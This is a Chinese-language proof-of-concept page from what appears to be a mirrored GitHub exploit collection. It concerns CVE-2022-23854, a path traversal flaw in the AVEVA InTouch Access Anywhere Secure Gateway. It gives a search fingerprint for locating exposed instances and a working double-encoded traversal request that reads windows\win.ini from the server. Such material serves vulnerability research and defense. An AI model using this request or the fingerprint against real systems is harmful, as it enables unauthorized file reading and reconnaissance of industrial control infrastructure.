admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 20:06:03 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/网络设备漏洞/AVEVA InTouch安全网关 AccessAnywhere 任意文件读取漏洞 CVE-2022-23854.md

31 lines
726 B
Markdown
Raw Normal View History

update
2024-11-06 14:10:36 +08:00
# AVEVA InTouch安全网关 AccessAnywhere 任意文件读取漏洞 CVE-2022-23854
## 漏洞描述
AVEVA InTouch Access Anywhere Secure Gateway 2020 R2及以前的版本存在路径遍历漏洞未授权的攻击者可利用该漏洞获取服务器敏感信息。
## 漏洞影响
```
AVEVA InTouch安全网关
```
## 网络测绘
```
body="InTouch Access Anywhere"
```
## 漏洞复现
登录页面
![image-20221017170909794](images/202210171709863.png)
验证POC
```
/AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini
```
![image-20221017170935596](images/202210171709651.png)
Reference in New Issue Copy Permalink